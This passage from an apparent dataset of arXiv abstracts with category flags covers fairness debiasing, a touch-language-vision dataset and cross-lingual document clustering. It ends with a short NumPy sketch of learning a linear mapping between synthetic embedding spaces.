with Shortcut Features | Machine learning models often learn to make predictions that rely on sensitive social attributes like gender and race, which poses significant fairness risks, especially in societal applications, such as hiring, banking, and criminal justice. Existing work tackles this issue by minimizing the employed information about social attributes in models for debiasing. However, the high correlation between the target task and these social attributes makes learning on the target task incompatible with debiasing. Given that model bias arises due to the learning of bias features (\emph{i.e.}, gender) that help target task optimization, we explore the following research question: \emph{Can we leverage shortcut features to replace the role of bias features in target task optimization for debiasing?} To this end, we propose \emph{Shortcut Debiasing}, which first transfers the target task's learning of bias attributes from bias features to shortcut features, and then employs causal intervention to eliminate shortcut features during inference. The key idea of \emph{Shortcut Debiasing} is to design controllable shortcut features that, on the one hand, replace bias features in contributing to the target task during the training stage and, on the other hand, are easily removed by intervention during the inference stage. This guarantees the learning of the target task does not hinder the elimination of bias features. We apply \emph{Shortcut Debiasing} to several benchmark datasets, and achieve significant improvements over the state-of-the-art debiasing methods in both accuracy and fairness. | false | false | false | false | true | false | true | false | false | false | false | false | false | true | false | false | false | false | 385,921
2403.09813 | Towards Comprehensive Multimodal Perception: Introducing the
Touch-Language-Vision Dataset | Tactility provides crucial support and enhancement for the perception and interaction capabilities of both humans and robots. Nevertheless, the multimodal research related to touch primarily focuses on visual and tactile modalities, with limited exploration in the domain of language. Beyond vocabulary, sentence-level descriptions contain richer semantics. Based on this, we construct a touch-language-vision dataset named TLV (Touch-Language-Vision) by human-machine cascade collaboration, featuring sentence-level descriptions for multimodal alignment. The new dataset is used to fine-tune our proposed lightweight training framework, STLV-Align (Synergistic Touch-Language-Vision Alignment), achieving effective semantic alignment with minimal parameter adjustments (1%). Project Page: https://xiaoen0.github.io/touch.page/. | false | false | false | false | false | false | false | true | false | false | false | true | false | false | false | false | false | false | 437,922
1604.05372 | Clustering Comparable Corpora of Russian and Ukrainian Academic Texts:
Word Embeddings and Semantic Fingerprints | We present our experience in applying distributional semantics (neural word embeddings) to the problem of representing and clustering documents in a bilingual comparable corpus. Our data is a collection of Russian and Ukrainian academic texts, for which topics are their academic fields. In order to build language-independent semantic representations of these documents, we train neural distributional models on monolingual corpora and learn the optimal linear transformation of vectors from one language to another. The resulting vectors are then used to produce `semantic fingerprints' of documents, serving as input to a clustering algorithm. The presented method is compared to several baselines including `orthographic translation' with Levenshtein edit distance and outperforms them by a large margin. We also show that language-independent `semantic fingerprints' are superior to multi-lingual clustering algorithms proposed in the previous work, at the same time requiring less linguistic resources. | false | false | false | false | false | false | false | false | true | false | false | false | false | false | false | false | false | false | 54,796 |
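The cross-lingual step this abstract relies on, learning "the optimal linear transformation of vectors from one language to another", is commonly fit by least squares over a seed dictionary of translation pairs. A toy NumPy sketch with synthetic embeddings standing in for the separately trained Russian and Ukrainian models (all data here is synthetic, for illustration only):

```python
import numpy as np

rng = np.random.default_rng(3)
d = 10
# Two monolingual embedding spaces related by an unknown linear map
W_true = rng.normal(size=(d, d))
src = rng.normal(size=(50, d))                        # "source-language" word vectors
tgt = src @ W_true + 0.01 * rng.normal(size=(50, d))  # noisy "target-language" counterparts

# Learn the linear transformation from the seed dictionary by least squares
W, *_ = np.linalg.lstsq(src, tgt, rcond=None)

# Map a held-out source vector into the target space
x = rng.normal(size=(1, d))
mapped = x @ W
err = np.linalg.norm(mapped - x @ W_true) / np.linalg.norm(x @ W_true)
print(f"mapping error: {err:.3f}")
```

Once all documents' vectors live in one shared space, the "semantic fingerprints" can be fed to any standard clustering algorithm, as the abstract describes.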